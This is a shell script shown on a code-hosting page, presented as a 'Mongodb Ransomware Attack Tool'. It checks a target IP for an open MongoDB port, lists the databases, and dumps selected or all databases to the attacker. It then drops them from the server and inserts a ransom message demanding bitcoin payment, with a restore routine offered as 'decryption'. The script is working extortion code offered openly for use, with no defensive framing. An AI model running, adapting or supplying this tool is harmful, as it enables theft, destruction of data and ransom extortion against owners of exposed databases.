-
Notifications
You must be signed in to change notification settings - Fork 0
/
script.sh
153 lines (137 loc) · 4.13 KB
/
script.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
#!/bin/sh
# declare mongodb port
PORT=27017
ADDR=$1
BITCOIN_ADDR="1F1tAaz5x1HUXrCNLbtMDqcw6o5GNn4xqX" # sample bitcoin address
# create banner function
banner() {
# banner
echo "Mongodb Ransomware Attack Tool v1.0"
echo "Author: @peculiardev"
echo "Date: 2023-06-14"
echo "Description: This tool is used to attack mongodb database and encrypt the data"
echo "Usage: ./script.sh <ip>"
echo "Example: ./script.sh 192.168.43.1"
}
# check if ip is provided
if [ -z "$1" ]; then
echo "Please provide the ip address of the mongodb server"
exit 1
fi
# checking if mongodb port is open using nmap
echo "check mongodb port..."
nmap -p $PORT $1 | grep open >/dev/null
isOpen=$?
if [ $isOpen -eq 0 ]; then
echo "mongodb port is open"
else
echo "mongodb port is closed"
exit 1
fi
listDatabases() {
echo "list all databases..."
echo "=============================="
mongo --host $ADDR --port $PORT --eval "printjson(db.adminCommand('listDatabases'))" | grep name | cut -d "\"" -f 4
echo "=============================="
}
encrypt() {
echo -n "Enter database name: " && read dbName
if [ -z "$dbName" ]; then
echo "Please provide the database name"
exit 1
fi
if [ $dbName = "admin" ]; then
echo "You cannot encrypt admin database"
exit 1
fi
# if * is provided, encrypt all databases
if [ $dbName = "*" ]; then
echo "encrypting all databases..."
databases=$(mongo --host $ADDR --port $PORT --eval "printjson(db.adminCommand('listDatabases'))" | grep name | cut -d "\"" -f 4)
for db in $databases; do
if [ $db = "admin" ]; then
echo "You cannot encrypt admin database"
exit 1
fi
# backup database
mongodump --host $ADDR --port $PORT --db $db /o $ADDR
# remove database from mongodb
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$db');db.dropDatabase();"
# set message that database is encrypted
echo -n "Enter message: " && read message
# set default message
if [ -z "$message" ]; then
message="Your database is encrypted, please pay 0.1 BTC to $BITCOIN_ADDR, if you want to decrypt your database"
fi
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$db');db.message.insert({message: '$message', encrypted: true});"
done
exit 1
else
echo "encrypting database..."
# backup database
mongodump --host $ADDR --port $PORT --db $dbName /o $ADDR
# delete database
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$dbName');db.dropDatabase();"
# set message that database is encrypted
echo -n "Enter message: " && read message
if [ -z "$message" ]; then
# set default message
message="Your database is encrypted, please pay 0.1 BTC to $BITCOIN_ADDR, if you want to decrypt your database"
fi
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$dbName');db.message.insert({message: '$message', encrypted: true});"
fi
}
decrypt() {
echo -n "Enter database name: " && read dbName
echo "decrypting database..."
if [ -z "$dbName" ]; then
echo "Please provide the database name"
exit 1
fi
if [ $dbName = "admin" ]; then
echo "You cannot decrypt admin database"
exit 1
fi
if [ "$dbName" = "*" ]; then
echo "decrypting all databases..."
databases=$(ls /$ADDR/)
for db in $databases; do
if [ $db = "admin" ]; then
echo "You cannot decrypt admin database"
exit 1
fi
# restore database
mongorestore --host $ADDR --port $PORT --db $db /o /$ADDR
# delete message
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$db');db.message.remove({});"
done
exit 1
else
# restore database
mongorestore --host $ADDR --port $PORT --db $dbName /o /$ADDR
# delete message
mongo --host $ADDR --port $PORT --eval "db = db.getSiblingDB('$dbName');db.message.remove({});"
fi
}
isLoop=1
while [ $isLoop -eq 1 ]; do
echo "1. List all databases"
echo "2. Encrypt database"
echo "3. Decrypt database"
echo "4. Show banner"
echo "5. Exit"
echo -n "Enter your choice: " && read choice
if [ $choice -eq 1 ]; then
listDatabases
elif [ $choice -eq 2 ]; then
encrypt
elif [ $choice -eq 3 ]; then
decrypt
elif [ $choice -eq 4 ]; then
banner
elif [ $choice -eq 5 ]; then
isLoop=0
else
echo "Invalid choice"
fi
done